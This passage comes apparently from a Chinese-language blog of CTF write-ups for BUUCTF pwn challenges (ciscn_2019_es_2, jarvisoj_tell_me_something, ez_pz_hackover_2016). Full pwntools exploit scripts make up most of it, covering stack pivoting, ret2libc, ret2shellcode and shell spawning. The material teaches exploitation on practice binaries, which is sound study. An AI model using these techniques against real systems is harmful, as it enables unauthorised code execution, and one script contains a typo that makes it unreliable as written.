class="line">p.recvuntil(<span class="string">&quot;name? &quot;</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">read_addr = u64(p.recvuntil(<span class="string">&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(read_addr)</span><br><span class="line">libc = LibcSearcher(<span class="string">&#x27;read&#x27;</span>, read_addr)</span><br><span class="line">libc_base = read_addr - libc.dump(<span class="string">&#x27;read&#x27;</span>)</span><br><span class="line"></span><br><span class="line">sys_addr = libc_base + libc.dump(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line">bin_sh = libc_base + libc.dump(<span class="string">&#x27;str_bin_sh&#x27;</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x28</span>+p64(pop_rdi)+p64(bin_sh)+p64(sys_addr)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="ciscn-2019-es-2"><a href="#ciscn-2019-es-2" class="headerlink" title="ciscn_2019_es_2"></a>ciscn_2019_es_2</h3><p>知识补充：<a target="_blank" rel="noopener" href="https://wiki.mrskye.cn/Pwn/stackoverflow/%E6%A0%88%E8%BF%81%E7%A7%BB/%E6%A0%88%E8%BF%81%E7%A7%BB/">栈迁移 - SkYe Wiki (mrskye.cn)</a></p>
<p>wp参考：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/remon535/p/13507217.html">pwn-ciscn_2019_es_2(栈迁移) - remon535 - 博客园 (cnblogs.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/mio-yy/p/15033931.html">ciscn_2019_es_2 - mio_yy - 博客园 (cnblogs.com)</a></p>
<blockquote>
<p>栈迁移核心思想就是利用leave和ret转移ebp和esp。leave和ret常用于复原栈</p>
<p>leave=mov esp,ebp</p>
<p>pop ebp</p>
<p>ret=pop eip</p>
</blockquote>
<p>查</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20211027201100380.png" alt="image-20211027201100380"></p>
<p>IDA跟进vul发现溢出点</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20211027201155997.png" alt="image-20211027201155997"></p>
<p>溢出的空间不足。read大小为0x30，s变量和ebp距离为0x28。只能覆盖ebp和ret。使用栈迁移解决栈空间不足的问题。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#p=remote(&#x27;node4.buuoj.cn&#x27;,27101)</span></span><br><span class="line">p=process(<span class="string">&#x27;./ciscn_2019_es_2&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;ciscn_2019_es_2&#x27;</span>)</span><br><span class="line">sys_plt=<span class="number">0x8048400</span></span><br><span class="line">leave_ret=<span class="number">0x8048562</span></span><br><span class="line"></span><br><span class="line">py=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x27</span></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;name?\n&#x27;</span>,py)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line">ebp=u32(p.recv(<span class="number">4</span>))</span><br><span class="line"></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">4</span>+p32(sys_plt)+p32(<span class="number">0</span>)+p32(ebp-<span class="number">0x28</span>)+<span class="string">&#x27;/bin/sh&#x27;</span></span><br><span class="line">payload=payload.ljust(<span class="number">0x28</span>,<span class="string">&#x27;\0&#x27;</span>)</span><br><span class="line">payload+=p32(ebp-<span class="number">0x38</span>)+p32(leave_ret)</span><br><span class="line">p.sendlineafter(<span class="string">&#x27;\n&#x27;</span>,payload)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="jarvisoj-tell-me-something"><a href="#jarvisoj-tell-me-something" class="headerlink" title="jarvisoj_tell_me_something"></a>jarvisoj_tell_me_something</h3><p>有fopen函数，相当于backdoor</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#p = process(&#x27;./guestbook&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>, <span class="number">29850</span>)</span><br><span class="line">sh = <span class="number">0x0400620</span></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x88</span> + p64(sh) </span><br><span class="line">p.recvuntil(<span class="string">&quot;message:&quot;</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="ez-pz-hackover-2016"><a href="#ez-pz-hackover-2016" class="headerlink" title="ez_pz_hackover_2016"></a>ez_pz_hackover_2016</h3><p>法一：peta调试。wp参考<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_45691294/article/details/112114073">(13条消息) ez_pz_hackover_2016_沫忆末忆的博客-CSDN博客_ez_pz_hackover_2016</a></p>
<p>查</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20211101203620034.png" alt="image-20211101203620034"></p>
<p>NX也没开，第一时间想到用ret2shellcode打，运行看</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20211101203803396.png" alt="image-20211101203803396"></p>
<p>IDA里跟进chall，是主结构</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20211101203707855.png" alt="image-20211101203707855"></p>
<p>没后门，保护全关，确定ret2shellcode。看代码得知，先打印出的来的地址是s的缓冲区地址，接收一个大小不超过1023字节的输入到s缓冲区，然后将缓冲区里换行符后面的内容全部置为0，最后将缓冲区内容与”crashme”这个字符串作比较，如果相同就会进入到vuln函数（这里很明显s是无法溢出的）</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20211101204410194.png" alt="image-20211101204410194"></p>
<p>memcpy函数，将第一个参数长度的内容复制到dest</p>
<p>所以。因为输入到s缓冲区的内容长度不够，无法实现溢出，利用vuln函数就可以把构造好的shellcode放入到栈中进行执行，要执行shellcode则要知道shellcode的地址，而chall函数在执行时就已经把s缓冲区的地址打印出来，最后计算s缓冲区和shellcode地址的相对偏移量，动调计算偏移就会得到shellcode的地址</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#p = process(&#x27;./ez_pz_hackover_2016&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>, <span class="number">29966</span>)</span><br><span class="line"></span><br><span class="line">shellcode = asm(shellcraft.sh())</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&#x27;lets crash: &#x27;</span>)</span><br><span class="line">stack_addr = <span class="built_in">int</span>(p.recv(<span class="number">10</span>), <span class="number">16</span>)</span><br><span class="line">shellcode_addr = stack_addr-<span class="number">28</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;crashme\x00&#x27;</span>.ljust(<span class="number">26</span>,<span class="string">&quot;\x00&quot;</span>)+p32(shellcode_addr)+shellcode</span><br><span class="line">p.sendlineafter(<span class="string">&quot;&gt; &quot;</span>,payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p>法二：pwndbg调试。wp参考<a target="_blank" rel="noopener" href="https://www.cnblogs.com/xlrp/p/14273703.html">BUUCTF]PWN——ez_pz_hackover_2016 - Angel-Yan - 博客园 (cnblogs.com)</a></p>
<p>利用思路也是往s参数里写入shellcode，执行vuln函数后让dest造成溢出，将返回地址修改为shellcode的地址去执行</p>
<p>接下来动调，找vuln函数里一个nop下断点</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=process(<span class="string">&#x27;./ez_pz_hackover_2016&#x27;</span>)</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line">gdb.attach(p,<span class="string">&#x27;b *0x8048600&#x27;</span>)<span class="comment">#利用gdb动调，在0x8048600处下了个断点</span></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&#x27;crash: &#x27;</span>)</span><br><span class="line">stack=<span class="built_in">int</span>(p.recv(<span class="number">10</span>),<span class="number">16</span>)<span class="comment">#接收回显的参数s在栈上的地址，长度是10，以16进制表示</span></span><br><span class="line">print(<span class="built_in">hex</span>(stack))</span><br><span class="line"></span><br><span class="line">payload=<span class="string">&#x27;crashme\x00&#x27;</span>+<span class="string">&#x27;aaaa&#x27;</span><span class="comment">#前面的crashme\x00绕过if判断</span></span><br><span class="line">      <span class="comment">#后面的aaaa是测试数据，去栈上找它的地址</span></span><br><span class="line">      <span class="comment">#利用它找到返回地址在栈上的地址，将返回地址覆盖为shellcode</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">pause()</span><br></pre></td></tr></table></figure>
<p>执行脚本，c执行到断点处，查看栈的布局情况   <code>stack 30</code></p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20211102150836424.png" alt="image-20211102150836424"></p>
<p>ebp位置：0x38</p>
<p>返回地址是ebp下面即：0x3c（刚好是0x38+4）</p>
<p>输入参数的位置：0x22（看的到”ashme”，“cr”在前面，它们的ascii码是63和72，72 63分别对应0x23，0x22，后两位依次是0x21，0x20）</p>
<p>所以ebp是距离输入点的0x38-0x22=0x16，shellcode位置写在他之后即0x16+4=0x1a（32位下ebp占4字节）</p>
<p>最后找shellcode导向的地址就行了！</p>
<p>首先，调试输出来的地址就是s的地址，保存在了stack变量中</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20211102150912458.png" alt="image-20211102150912458"></p>
<p>而shellcode要导向的地址，也就是栈溢出覆盖后返回地址的下面，所以shellcode是0xffa28110，那么shellcode的地址在0xffa28110也就是s上面即 0xffa2812c-0xffa28110=0x1c的位置，即address=stack-0x1c。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">r=process(<span class="string">&#x27;./ez_pz_hackover_2016&#x27;</span>)</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(p,&#x27;b *0x8048600&#x27;)</span></span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">&#x27;crash: &#x27;</span>)</span><br><span class="line">stack=<span class="built_in">int</span>(r.recv(r10),<span class="number">16</span>)</span><br><span class="line">shellcode=asm(shellcraft.sh())</span><br><span class="line"><span class="comment">#print hex(stack)</span></span><br><span class="line"></span><br><span class="line">payload=<span class="string">&#x27;crashme\x00&#x27;</span>+<span class="string">&#x27;a&#x27;</span>*(<span class="number">0x16</span>-<span class="number">8</span>+<span class="number">4</span>)+p32(stack-<span class="number">0x1c</span>)+shellcode<span class="comment">#其中有8个字节是&quot;crashme\x00”，所以减个8</span></span><br><span class="line">r.sendline(payload)</span><br><span class="line"></span><br><span class="line"><span class="comment">#pause()</span></span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="ctfhub"><a href="#ctfhub" class="headerlink" title="ctfhub"></a>ctfhub</h2>
    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Pwn%E5%88%B7%E9%A2%98/" rel="tag"># Pwn刷题</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2021/11/05/%E2%80%9Cbugku-pwn%E2%80%9D/" rel="prev" title="bugku-pwn">
                  <i class="fa fa-chevron-left"></i> bugku-pwn
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E8%BF%9B%E9%98%B6Re/" rel="next" title="攻防世界进阶Re">
                  攻防世界进阶Re <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>







<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      const activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      const commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>
</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">YX</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="//cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
